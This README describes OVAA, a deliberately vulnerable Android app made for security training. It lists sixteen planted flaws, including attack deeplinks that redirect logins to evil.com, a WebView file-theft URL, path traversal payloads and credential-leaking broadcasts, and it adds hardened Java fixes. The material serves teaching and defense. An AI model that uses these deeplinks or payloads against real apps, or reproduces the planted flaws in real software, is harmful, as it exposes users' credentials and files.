Oversecured Vulnerable Android App
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.
1. Attacker-controlled `login_url` via the deeplink `oversecured://ovaa/login?url=http://evil.com/`. Leads to the user's username and password being leaked when they log in.
2. Unauthorized URI permission grant (activity declared with `android:grantUriPermissions="true"`) via the deeplink `oversecured://ovaa/grant_uri_permissions`. The attacker's app needs to handle `oversecured.ovaa.action.GRANT_PERMISSIONS` and pass an intent to `setResult(code, intent)` with flags such as `Intent.FLAG_GRANT_READ_URI_PERMISSION` and the URI of the content provider.
3. Theft of arbitrary files via the deeplink `oversecured://ovaa/webview?url=...`, e.g. `oversecured://ovaa/webview?url=http://evilexample.com`. An attacker can abuse the vulnerable WebView setting `WebSettings.setAllowFileAccessFromFileURLs(true)` in `WebViewActivity.java` to steal arbitrary files by sending XHR requests to them and reading their content.
4. Intent redirection in `LoginActivity` by supplying an arbitrary Intent object in `redirect_intent`.
5. Interception of the implicit `Intent.ACTION_PICK` activity launch from `MainActivity`: the attacker's app handles the pick and passes the URI of any file back as data.
6. Unprotected broadcast from `MainActivity` containing credentials. The attacker can register a broadcast receiver for action `oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA` and obtain the user's data.
7. Implicit intent from `MainActivity` with action `oversecured.ovaa.action.WEBVIEW`, containing the user's encrypted data in the query parameter `token`.
8. Arbitrary file deletion via the `DeleteFilesSerializable` deserialization object.
9. Memory corruption via the `MemoryCorruptionParcelable` object.
10. Memory corruption via the `MemoryCorruptionSerializable` object.
11. Arbitrary file theft and overwrite in `TheftOverwriteProvider` via path traversal in the value of `uri.getLastPathSegment()`.
12. Insecure logging in `InsecureLoggerService`. Leak of credentials in `LoginActivity` via `Log.d("ovaa", "Processing " + loginData)`.
13. Weak cryptography in `WeakCrypto`.
14. Arbitrary code execution in `OversecuredApplication` by launching code from third-party apps with no security checks.
15. Insecure `oversecured.ovaa.fileprovider` content provider configuration (`root` entry).
16. Insecure URL in `strings.xml` (`test_url` entry).
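Items 1 and 3 share one root cause: a URL taken from a deeplink query parameter is used without checking its scheme or host, and item 3 then adds the `setAllowFileAccessFromFileURLs(true)` WebView setting that turns an attacker-chosen page into a file reader. The following is an added example written for this README, not OVAA's `WebViewActivity` or `LoginActivity`; the class name `SafeWebViewActivity`, the helper `checkUrl` and the allowlist host `ovaa.example.com` are assumptions standing in for whatever origin the real screen is meant to show.

```java
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Hypothetical hardened handler for oversecured://ovaa/webview?url=... (example
// code for this README; not part of OVAA). The same checkUrl() applies to the
// url parameter of oversecured://ovaa/login?url=... before it is used as the
// login endpoint.
public class SafeWebViewActivity extends Activity {

    // Assumption: the only origin this screen may display. The allowlist is the
    // point; the host value is a placeholder.
    static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("ovaa.example.com"));

    /** Returns the normalized URL if it is https on an allowed host, otherwise null. */
    static String checkUrl(String raw) {
        if (raw == null) return null;
        URI u;
        try {
            // java.net.URI is strict: backslashes, spaces and control characters
            // throw instead of being "repaired" into a different host.
            u = new URI(raw);
        } catch (URISyntaxException e) {
            return null;
        }
        String scheme = u.getScheme();
        String host = u.getHost();
        if (scheme == null || host == null) return null;
        // Rejects http://, file://, content://, javascript: and intent: alike.
        if (!"https".equals(scheme.toLowerCase(Locale.ROOT))) return null;
        // Rejects https://ovaa.example.com@evil.com/ (userinfo trick).
        if (u.getUserInfo() != null) return null;
        if (!ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) return null;
        return u.toString();
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView web = new WebView(this);
        setContentView(web);

        WebSettings s = web.getSettings();
        // OVAA's bug is setAllowFileAccessFromFileURLs(true): a page loaded from a
        // file:// URL may then XHR any file the app can read. Switch off every
        // file:// and content:// bridge; a remote page never needs them.
        s.setAllowFileAccess(false);
        s.setAllowFileAccessFromFileURLs(false);
        s.setAllowUniversalAccessFromFileURLs(false);
        s.setAllowContentAccess(false);

        // Re-check every navigation, not only the first load, so a redirect from
        // an allowed host cannot leave the allowlist.
        web.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                return checkUrl(request.getUrl().toString()) == null; // true blocks the load
            }
        });

        Uri data = getIntent().getData();
        String target = data == null ? null : checkUrl(data.getQueryParameter("url"));
        if (target == null) {
            // Refuse outright; do not fall back to a default page while keeping
            // the attacker's parameter around.
            finish();
            return;
        }
        web.loadUrl(target);
    }
}
```

`Uri.getQueryParameter` already percent-decodes the value, so the check runs on the URL the WebView would actually load. Comparing the host against an allowlist rather than checking `startsWith("https://ovaa.example.com")` is deliberate: the prefix check is defeated by `https://ovaa.example.com.evil.com/`.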
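For item 11, the detail that matters is that `Uri.getLastPathSegment()` returns the decoded segment, so a caller can smuggle slashes into it with `%2F`. The following is an added example for this README, not OVAA's `TheftOverwriteProvider`: a hypothetical `SafeExportProvider` with a `resolveUnder` helper that canonicalizes the requested path and checks it stays under the intended directory, and an `openFile` that refuses write modes. The `exports` subdirectory and the example traversal path in the comment are assumptions.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

// Hypothetical hardened provider (example code for this README; not part of OVAA).
// If no other app needs it, the first fix is android:exported="false" or a
// permission on the <provider> element; the path check below is what protects
// a provider that must stay reachable.
public class SafeExportProvider extends ContentProvider {

    /**
     * Resolves lastSegment under base and returns the canonical File, or null when
     * the result would leave base. Uri.getLastPathSegment() hands back the DECODED
     * segment, so content://authority/..%2F..%2Fshared_prefs%2Fx.xml (illustrative
     * path) arrives here as "../../shared_prefs/x.xml"; canonicalizing both sides
     * catches that, symlinks inside base, and "./" padding alike.
     */
    static File resolveUnder(File base, String lastSegment) {
        if (lastSegment == null || lastSegment.isEmpty()) return null;
        try {
            File root = base.getCanonicalFile();
            File candidate = new File(root, lastSegment).getCanonicalFile();
            // Trailing separator so /data/.../exports2 does not pass as /data/.../exports.
            String prefix = root.getPath() + File.separator;
            return candidate.getPath().startsWith(prefix) ? candidate : null;
        } catch (IOException e) {
            return null;
        }
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        // Serve from one dedicated directory, never from getFilesDir() itself.
        File base = new File(getContext().getFilesDir(), "exports");
        File f = resolveUnder(base, uri.getLastPathSegment());
        if (f == null) {
            throw new FileNotFoundException("rejected path: " + uri);
        }
        // A write mode ("w", "rw", "wt") is what turns file theft into file
        // overwrite; this provider hands out read-only descriptors only.
        if (!"r".equals(mode)) {
            throw new FileNotFoundException("read-only provider");
        }
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    @Override public boolean onCreate() { return true; }
    @Override public Cursor query(Uri uri, String[] projection, String selection,
                                  String[] selectionArgs, String sortOrder) { return null; }
    @Override public String getType(Uri uri) { return "application/octet-stream"; }
    @Override public Uri insert(Uri uri, ContentValues values) { return null; }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) { return 0; }
    @Override public int update(Uri uri, ContentValues values, String selection,
                                String[] selectionArgs) { return 0; }
}
```

Checking for the substring `..` in the segment is not enough on its own: a symlink planted under `exports` can point anywhere, and `getCanonicalFile()` is what resolves it before the prefix comparison.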
Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc
https://oversecured.com/